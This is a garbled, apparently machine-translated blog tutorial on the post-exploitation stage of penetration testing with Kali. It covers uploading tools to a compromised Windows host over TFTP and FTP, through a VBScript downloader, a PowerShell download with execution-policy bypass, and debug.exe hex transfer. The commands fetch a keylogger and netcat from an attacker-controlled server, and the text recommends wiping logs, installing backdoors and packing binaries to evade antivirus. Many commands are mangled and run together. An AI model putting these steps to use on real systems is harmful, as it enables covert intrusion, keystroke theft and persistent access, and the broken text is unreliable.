Little white Diary 20:kali penetration test after penetration test phase (a)--upload Tool

Post-Penetration testing phase-upload Tool

In order to prevent the administrator from filling in the vulnerability, we can no longer control the other host through the vulnerability, so the post-penetration testing phase is required

1, upload a variety of tools

2, right: In order to fully control the target system

3, erase the attack traces: Prevent the administrator through the log tracing, found the source of the attack "in addition to the system diary, the application will also have their own log information"

# #删除系统日记和应用程序日记

For example: in Slmail

4, install the Backdoor program

Achieve long-term control, dump password, as a springboard to infiltrate the intranet "most of the time, than the public network infiltration simple"

Note: Post-infiltration utilization stage

Biggest challenge: Anti-virus software "avira based on the virus signature library". So we need to use legitimate remote control software (NC) to "try to avoid killing, but it may also be detected after antivirus software update feature library"

Upload Tool

Objective: To extend the control capability of the target system by long-term control

Linux Systems

It is easy to implement the upload tool under Linux system, because it installs netcat, curl, wget by default, even if Netcat is not installed, it is easy to use curl and wget to download installation trojan, netcat, etc. to the hacker shared server. Curl and wget are bound to be installed by default on Linux systems.

Windows system

Relatively speaking, there is a lack of pre-installed tools under Windows System, it is difficult to download tools such as Trojans

Getshell, Windows system download wooden Door Tool Example

Http://www.freebuf.com/articles/network/100788.html

According to the small white diary 17,getshell "This is the class NC remote control Shell, is a non-interactive shell (that is, the Command line window must enter a complete command, cannot be tab-completion)"

Interactive shell vs. non-interactive shell differences: http://kuku789123.blog.163.com/blog/static/1361673512012101513628599/

Install FTP software under Windows system, experience the disadvantage of non-interactive shell, add/Remove Components "appwiz.cpl" "need to insert disc"

So we have to upload some Trojan programs that provide interactive "grey pigeons, etc."

Upload Tool Posture

1. Use TFTP transfer file "to construct a TFTP server, place the tool trojan in the server, and then download it via the controlled terminal connection"

XP, 2003 default installation, WIN7, 2008 systems need to be added separately, but often by the border firewall filtering. Mainstream for FTP because of the UDP protocol, clear text transmission, authentication not supported

Using Kali

Mkdir/tftp #创建tftp目录

Chown-r Nobody set permissions owner to nobody "no local logon rights"

cp/usr/share/windows-binaries/whoami.exe/tftp/#windows下查看当前用户

cp/usr/share/windows-binaries/klogger.exe/tftp/#拷贝键盘记录器

ATFTPD--daemon--port 69/tftp/#daemon, start in the background, the home directory points to TFTP

Due to permissions issues, the following FAQ appears: "Boot process is not TFTP"

Kill 543 for this process, use chown-r nobody/tftp/"change owner to Nobody"

Restart Service

Go to the shell window to see the TFTP

For TFTP file transfer

Tasklist #查看进程

The keylogger will record the administrator's input, and then the text file will be generated in the same directory as the keyboard input.

Type Klogger

2. Transfer using FTP

First Apt-get Install on Kali pure-ftpd

Use the script Configuration "Remember: Set the password, the following echo will use"

#!/bin/bashgroupadd ftpgroupuseradd-g ftpgroup-d/dev/null-s/etc ftpuserpure-pw useradd yuanfh-u ftpuser-d/FTPHOMEP URE-PW mkdbcd/etc/pure-ftpd/auth/ln-s. /conf/puredb 60pdbmkdir-p/ftphomechown-r ftpuser:ftpgroup/ftphome/                   #创建的ftp主目录/etc/init.d/pure-ftpd Restart

Verifying the FTP

Because of the non-interactive system, the FTP transmission, in the password command can not be displayed, so you need to transfer ideas to download

Idea: "The command that will be implemented is written to the target server's text file, and the command to read the text file by FTP is downloaded"

C:\>echo Open 192.168.1.127 21>ftp.txtecho open 192.168.1.127 21>ftp.txtc:\>echo yuanfh>> Ftp.txtecho Yuanfh>>ftp.txtc:\>echo Password>>ftp.txtecho Password>>ftp.txtc:\>echo Bin >>ftp.txtecho Bin>>ftp.txtc:\>echo get Whoami.exe >> ftp.txtecho get Whoami.exe >> FTP.TXTC : \>echo get Klogger.exe >> ftp.txtecho get klogger.exe >> ftp.txtc:\>echo bye >> ftp.txtecho Bye & Gt;> Ftp.txt

# #先将whoami, Klogger and other programs copied to ftphome directory "cp/tftp/*/ftphome/"
Ftp-s:ftp.txt

3. Transfer files using Vbscrirt

#VBS是windows系统上默认的解释型脚本语言, Perl was added after Win7

# #通过web程序, HTTP protocol download remote control program, need to start apache2 in Kali

[Email protected]:~# service apache2 start[email protected]:~# Netstat-pantu | GREP:80TCP6       0 0::: $:                   ::*                    LISTEN      4433/apache2      

Go to apache2 default directory, copy files

[Email protected]:~# cd/var/www/html[email protected]:/var/www/html# cp/ftphome/*. [Email protected]:/var/www/html# lsindex.html  Klogger.exe  

Paste the following command into the shell window

echo strURL = WScript.Arguments.Item (0) > Wget.vbsecho strfile = WScript.Arguments.Item (1) >> Wget.vbsecho Const Httprequest_proxseitting_default = 0 >> wget.vbsecho Const httprequest_proxseitting_preconfig = 0 >> Wget.vb Secho Const HTTPREQUEST_PROXSEITTING_DIRECT = 1 >> wget.vbsecho const HTTPREQUEST_PROXSEITTING_PROXY = 2 >> WG Et.vbsecho Dim http, Varbytearray, strdata,strbuffer,lngcounter,fs,ts >> wget.vbsecho err.clear >> Wget.vbsecho Set http = Nothing >> Wget.vbsecho Set http = CreateObject ("winhttp.winhttprequest.5.1") >> wget. Vbsecho if HTTP is noting then Set http = createobjiect ("winhttp.winhttprequest") >> Wget.vbsecho if HTTP is noting Then Set http = Createobjiect ("WinHttp.MSXML2.ServerXMLHTTP") >> Wget.vbsecho If HTTP was noting then set http = Crea Teobjiect ("Microsoft.XMLHTTP") >> Wget.vbsecho http. Open "GET", Strurl,false >> Wget.vbsecho http. Send >> Wget.vbsecho Varbytearray = http. ResPonsebody >> Wget.vbsecho Set http = noting >> Wget.vbsecho set fs = CreateObject ("Scrippting.filesystemobject ") >> wget.vbsecho Set ts = fs.  CreateTextFile (strfile,true) >> Wget.vbsecho strdata = "" >> wget.vbsecho Strbuffer = "" >> Wget.vbsecho For lngcounter = 0 to UBound (varbytearray) >> Wget.vbsecho ts. Write Chr (255 and ASCB (MIIDB (Varbytearray,lngcounter +))) >> Wget.vbsecho Next >> wget.vbsecho ts. Close >> Wget.vbs

cscript wget.vbs Http://192.168.1.127/whoami.exe w.exe

"Windows system comes with the Cscipt command to download Whoami.exe named W.exe, after the transfer is complete, you need to restart the target system"

4. Use PowerShell to transfer files to the destination server download program

# #需在windows系统下运行

$strongeDir = $pwd $webclient = new-object System.net.webclient$url = "Http://192.168.1.127/whoami.exe" $file = " New-exsploit.exe "$webclient DownloadFile ($url, $file)

Powershell.exe-executionpolicy Bypass-nologo-nonlnteractive-noprofile-file Wget.ps1

5. Using Debug to transfer files

Debug is a compiled, disassembled 16 dump tool that, by default, transmits only 64k bytes of data as a file transfer

First, using UPX compressed file for compression and then transfer

Cp/usr/share/windows-binaries/nc.exe. #拷贝nc到根目录

[Email protected]:~# upx-9 nc.exe                          #-9: Maximum compression                       Ultimate Packer for executables                          Copyright (C) 1996-2013upx 3.9 1        Markus Oberhumer, Laszlo Molnar & John reiser   Sep 30th        File size         Ratio      Format      name< c10/>--------------------   ------   -----------   -----------     59392-     29184   49.14%    win32/pe     nc.exe                        Packed 1 file.

Second, the EXE program into 16 binary text format

Wine/usr/share/windows-binaries/exe2bat.exe Nc.exe Nc.txt
Copy all 16 of the code in the text file (except the countdown two lines) to the shell window

Debug<123.hex #生成1. dll

Copy 1.dlll Nc.exe

Small white diary 20:kali penetration test after penetration test phase (a)--upload tool